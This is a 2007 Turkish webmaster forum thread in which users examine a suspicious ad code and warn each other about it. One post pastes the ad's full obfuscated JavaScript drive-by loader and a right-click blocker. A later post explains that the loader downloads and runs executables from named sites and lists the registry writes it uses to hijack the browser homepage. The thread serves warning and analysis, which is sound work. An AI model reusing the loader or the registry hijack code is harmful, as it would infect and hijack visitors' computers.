Bu site virüslümü ?

iLgisiz · 15 Mayıs 2007

merhaba arkadaşlar, bir site benim siteme reklam verdi ve arkadaşlarımdan bir kaçı pcimize virüs girdi dedi bende bu koddan şüphelendim,

http://www.ikizsohbet.com/reklam.swf.htm

aceba virüs varmı yok mu ?

Loi · 15 Mayıs 2007

Ben java scriptden anlamam, eger viruslu ise bu sayfa bu mesaj okundugunda sayfanin sahibi kodlari silecektir o nedenle anlayanlar bu kodlari tercume edebilirmi?

<script language=javascript>
function dF(s){
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)
t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
dF('%264Dtdsjqu%2631mbohvbhf%264E%2633kbwbtdsjqu%2633%264F%261Bepdvnfou/xsjuf%2639voftdbqf%2639%2638%26364D%263684%263674%263683%26367%3A%263681%263685%263631%26367D%263672%26367F%263678%263686%263672%263678%263676%26364E%263633%263667%263653%263664%263674%263683%26367%3A%263681%263685%263633%26364F%26361B%26367G%26367F%263631%263676%263683%263683%26367G%263683%263631%263683%263676%263684%263686%26367E%263676%263631%26367F%263676%263689%263685%26361B%263675%26367D%263631%26364E%263631%263633%263659%263685%263685%263681%26364B%26363G%26363G%263688%263688%263688%26363F%26367C%26367D%263672%263687%26368%3A%263676%26367E%26367%3A%26368B%26363F%26367G%263683%263678%26363G%263652%263675%263672%26367F%263672%26367D%26367%3A%26363F%263679%263685%263672%263633%26361B%263664%263676%263685%263631%263675%263677%263631%26364E%263631%263675%26367G%263674%263686%26367E%263676%26367F%263685%26363F%263674%263683%263676%263672%263685%263676%263656%26367D%263676%26367E%263676%26367F%263685%263639%263633%26367G%263673%26367B%263676%263674%263685%263633%26363%3A%26361B%263675%263677%26363F%263684%263676%263685%263652%263685%263685%263683%26367%3A%263673%263686%263685%263676%263631%263633%263674%26367D%263672%263684%263684%26367%3A%263675%263633%26363D%263631%263633%263674%26367D%263684%26367%3A%263675%26364B%263653%263655%26364%3A%263647%263654%263646%263646%263647%26363E%263647%263646%263652%263644%26363E%263642%263642%263655%263641%26363E%26364%3A%263649%263644%263652%26363E%263641%263641%263654%263641%263645%263657%263654%263643%26364%3A%263656%263644%263647%263633%26361B%263684%263685%263683%26364E%263633%26365E%26367%3A%263674%263683%26367G%263684%26367G%263677%263685%26363F%263669%26365E%26365D%263659%263665%263665%263661%263633%26361B%263664%263676%263685%263631%263689%263631%26364E%263631%263675%263677%26363F%263654%263683%263676%263672%263685%263676%26365G%263673%26367B%263676%263674%263685%263639%263684%263685%263683%26363D%263633%263633%26363%3A%26361B%263672%263642%26364E%263633%263652%263675%26367G%263633%26361B%263672%263643%26364E%263633%263675%263673%26363F%263633%26361B%263672%263644%26364E%263633%263664%263685%263683%263633%26361B%263672%263645%26364E%263633%263676%263672%26367E%263633%26361B%263684%263685%263683%263642%26364E%263672%263642%263637%263672%263643%263637%263672%263644%263637%263672%263645%26361B%263684%263685%263683%263646%26364E%263684%263685%263683%263642%26361B%263684%263676%263685%263631%263664%263631%26364E%263631%263675%263677%26363F%263674%263683%263676%263672%263685%263676%26367G%263673%26367B%263676%263674%263685%263639%263684%263685%263683%263646%26363D%263633%263633%26363%3A%26361B%263664%26363F%263685%26368%3A%263681%263676%263631%26364E%263631%263642%26361B%263684%263685%263683%263647%26364E%263633%263658%263656%263665%263633%26361B%263689%26363F%26365G%263681%263676%26367F%263631%263684%263685%263683%263647%26363D%263631%263675%26367D%26363D%263631%263657%263672%26367D%263684%263676%26361B%263689%26363F%263664%263676%26367F%263675%26361B%263677%26367F%263672%26367E%263676%263642%26364E%263633%26367F%263676%263688%26363F%263679%263685%263672%263633%26361B%263684%263676%263685%263631%263657%263631%26364E%263631%263675%263677%26363F%263674%263683%263676%263672%263685%263676%26367G%263673%26367B%263676%263674%263685%263639%263633%263664%263674%263683%26367%3A%263681%263685%26367%3A%26367F%263678%26363F%263657%26367%3A%26367D%263676%263664%26368%3A%263684%263685%263676%26367E%26365G%263673%26367B%263676%263674%263685%263633%26363D%263633%263633%26363%3A%26361B%263684%263676%263685%263631%263685%26367E%263681%263631%26364E%263631%263657%26363F%263658%263676%263685%263664%263681%263676%263674%26367%3A%263672%26367D%263657%26367G%26367D%263675%263676%263683%263639%263643%26363%3A%26361B%263677%26367F%263672%26367E%263676%263642%26364E%263631%263657%26363F%263653%263686%26367%3A%26367D%263675%263661%263672%263685%263679%263639%263685%26367E%263681%26363D%263677%26367F%263672%26367E%263676%263642%26363%3A%26361B%263664%26363F%26367G%263681%263676%26367F%26361B%263664%26363F%263688%263683%26367%3A%263685%263676%263631%263689%26363F%263683%263676%263684%263681%26367G%26367F%263684%263676%263653%26367G%263675%26368%3A%26361B%263664%26363F%263684%263672%263687%263676%263685%26367G%263677%26367%3A%26367D%263676%263631%263677%26367F%263672%26367E%263676%263642%26363D%263643%26361B%263664%26363F%263674%26367D%26367G%263684%263676%26361B%263684%263676%263685%263631%263662%263631%26364E%263631%263675%263677%26363F%263674%263683%263676%263672%263685%263676%26367G%263673%26367B%263676%263674%263685%263639%263633%263664%263679%263676%26367D%26367D%26363F%263652%263681%263681%26367D%26367%3A%263674%263672%263685%26367%3A%26367G%26367F%263633%26363D%263633%263633%26363%3A%26361B%263662%26363F%263664%263679%263676%26367D%26367D%263656%263689%263676%263674%263686%263685%263676%263631%263677%26367F%263672%26367E%263676%263642%26363D%263633%263633%26363D%263633%263633%26363D%263633%26367G%263681%263676%26367F%263633%26363D%263641%26361B%26364D%26363G%263684%263674%263683%26367%3A%263681%263685%26364F%2638%263%3A%263%3A%264C%261B%264D0tdsjqu%264F1');
</script>

<SCRIPT language=JavaScript>curPage=1;
document.oncontextmenu = function(){return false}
if(document.layers) {
window.captureEvents(Event.MOUSEDOWN);
window.onmousedown = function(e){
if(e.target==document)return false;
}
}
else {
document.onmousedown = function(){return false}
}</SCRIPT>

keyfinebak.com · 15 Mayıs 2007

siteye girenlerin pc'ye 3 adet mirc programı tarzında bişiler yüklüyor ve explorer sayfasını kitliyor. aynı şeyi banada yapmaya çalıştı ama defettim başımdan. Gerçi sonradan al elinden parasını yayınlama reklamı gibi düşündüm ama ondan bir farkım olmazdı. parasıda lazım değil kendide zihinsel özürlü mahlukat.

msn adresleri :

[email protected]
[email protected]

bu tarz beyinsiz mahlukatlardan uzak durmak gerekiyor.

Loi · 15 Mayıs 2007

Ben firefox kullanmaktayim ve bu tur seyler beni pek etkilemiyor. Tum webmasterlara siddetle oneriyorum FIREFOX kullanin. Ayrica keyfinebak.com unda belirttigi gibi icerisinde reklam kodlarinin bulunmadigi sizinde anlamadiginiz kodlarin bulundugu sayfalara iframe actirmayin. Bu tur reklamlar almayin..

keyfinebak.com · 15 Mayıs 2007

Loi' Alıntı:
Ben firefox kullanmaktayim ve bu tur seyler beni pek etkilemiyor. Tum webmasterlara siddetle oneriyorum FIREFOX kullanin. Ayrica keyfinebak.com unda belirttigi gibi icerisinde reklam kodlarinin bulunmadigi sizinde anlamadiginiz kodlarin bulundugu sayfalara iframe actirmayin. Bu tur reklamlar almayin..

Loi firefox konusunda sana katılıyorum ama işte sitelerimize gelen ziyaretçilerin çoğu explorer kullanıyor. kendimiz gibi onlarıda düşünmeliyiz. böle kendi çıkarında hareket eden bir zavallı yüzünden sitemiz ziyaretçilerini zor durumda bırakmamalıyız. ve dediğin gibi verdiği kod iframe içindeydi huylandım olaydan siteyi inceleme fırsatımda olmadı denemeyi yaptığımda bilgisayara 3 tane program vari bişi yüklenmiş ve explorer ana sayfasına bi siteyi eklemişti. yazık dedim bastım msnden engeli elemana.

yukarıdaki mail adreslerini kullanıyor, dikkatli olmakta fayda var.

iLgisiz · 15 Mayıs 2007

keyfinebak.com' Alıntı:
siteye girenlerin pc'ye 3 adet mirc programı tarzında bişiler yüklüyor ve explorer sayfasını kitliyor. aynı şeyi banada yapmaya çalıştı ama defettim başımdan. Gerçi sonradan al elinden parasını yayınlama reklamı gibi düşündüm ama ondan bir farkım olmazdı. parasıda lazım değil kendide zihinsel özürlü mahlukat.

msn adresleri :

[email protected]
[email protected]

bu tarz beyinsiz mahlukatlardan uzak durmak gerekiyor.

evet onlar tam birer şerefsiz! zaten ilk nete girdiğimde tanıyorum irc serverlerda reklam atıyorlardı atabey tanır . forumda nicki var sanırım

Loi · 15 Mayıs 2007

Baglandigi IRC sunucularini buraya yazarsaniz IPleri kontrol eder datacenterlara hizmet vermelerini engelletebiliriz. Muhtemelen saldiri botuda yukleniyordur makinalara..

maiL · 15 Mayıs 2007

banada gelmişti bir keresinde iframe ile kendi kodlarını yayınlamamı istedi.
daha kodları almadan anladım yamuk olduğunu site adresini istedim. girdim mircler yüklenmişti. böyle kendini cin oldum şeytan çarpıcam ayağına yatanlara uyuz oluyorum.

DincerAydogdu · 15 Mayıs 2007

Kötü amaçlarla kullanılmaması için kodun deşifre edilmiş halini buraya koymuyorum ama yaptıklarını ve bulaşmışsa ne yapılması gerektiğini anlatmaya çalışayım.

Sistem sayfaya internet explorer tarafından desteklenen vbscript basıyor. Bu script ile activex kullanarak http://www.klavyemiz.org adresinden yeni bir vbscript indiriyor ve bunu internet explorer temporary files içine new.hta ismiyle kaydediyor ve bu kaydettiği dosyaya çalışma emri veriyor. Çalıştığı zaman c:\windows\news.vbs ve c:\windows\cansu2.exe şeklinde iki dosya atıyor ve bunların içeriğine http://www.asigenclik.net/kelebek.exe adresinden aldığı datayı koyuyor. Nihayetinde bunları çalıştırıyor.

En son olarak alttaki register ayarlarını değiştiriyor.

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Bar", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Local Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\Source", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\SubscribedURL", "http://www.esenruzgar.net","REG_SZ"

Tüm bu işlemler için http://www.klavyemiz.org, http://www.asigenclik.net ve http://www.esenruzgar.net adresleri kullanılıyor. Tabi ki indirdiği exe file’ları çalıştırmadım. O nedenle nereye ne yazdığını bilemiyorum. Ancak üstte geçen tüm dosyaları silerseniz muhtemelen bu dertten kurtulursunuz. Bu arada bu sadece kopya windowslarda ortaya çıkar. IE’nin bu açığı yeni yamalarla kapatıldı.

Bence bunlar ve benzerleri için şikayet edilebilecek bir merciye ulaşmak lazım. Böyle onursuzca ve alanen yapılan bir harekete tepkisiz kalmak olmaz.

Bu site virüslümü ?

0

0

0

0

0

0

0

maiL

0

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5